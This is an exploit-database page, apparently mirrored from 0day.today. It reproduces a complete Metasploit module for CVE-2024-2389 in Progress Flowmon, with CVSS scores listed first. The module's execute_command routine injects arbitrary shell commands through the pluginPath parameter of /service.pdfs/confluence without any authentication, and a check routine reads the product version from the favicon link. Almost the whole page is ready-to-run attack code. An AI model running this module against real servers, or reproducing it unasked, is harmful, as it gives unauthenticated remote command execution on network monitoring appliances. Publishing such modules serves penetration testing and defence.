Flowmon Unauthenticated Command Injection Exploit

2024-06-0200:00:00

metasploit

0day.today

vulnerability

command injection

progress flowmon

unauthenticated

cve-2024-2389

rhino security labs

metasploit

exploit

unix

linux

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

7 High

AI Score

Confidence

Low

0.003 Low

EPSS

Percentile

69.9%

JSON

This Metasploit module exploits an unauthenticated command injection vulnerability in Progress Flowmon versions before v12.03.02.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Flowmon Unauthenticated Command Injection',
        'Description' => %q{
          This module exploits an unauthenticated command injection vulnerability in Progress Flowmon
          versions before v12.03.02.
        },
        'Author' => [
          'Dave Yesland with Rhino Security Labs',
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-2389'],
          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],
          ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
        ],
        'DisclosureDate' => '2024-04-23',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [['Automatic', {}]],
        'Privileged' => false,
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])
    ])
  end

  def execute_command(cmd)
    send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),
      'method' => 'GET',
      'vars_get' => {
        'file' => rand_text_alphanumeric(8),
        'lang' => rand_text_alphanumeric(8),
        'pluginPath' => "$(#{cmd})"
      }
    )
  end

  def exploit
    print_status('Attempting to execute payload...')
    execute_command(payload.encoded)
  end

  def check
    print_status("Checking if #{peer} can be exploited!")

    uri = normalize_uri(target_uri.path, 'homepage/auth/login')
    res = send_request_cgi(
      'uri' => uri,
      'method' => 'GET'
    )

    return CheckCode::Unknown('Connection failed') unless res
    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface'

    # Use a regular expression to extract the version number from the response
    version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})

    return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1]

    print_status("Detected version: #{version[1]}")

    if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')
      CheckCode::Vulnerable("Version #{version[1]} is vulnerable.")
    else
      CheckCode::Safe("Version #{version[1]} is not vulnerable.")
    end
  end
end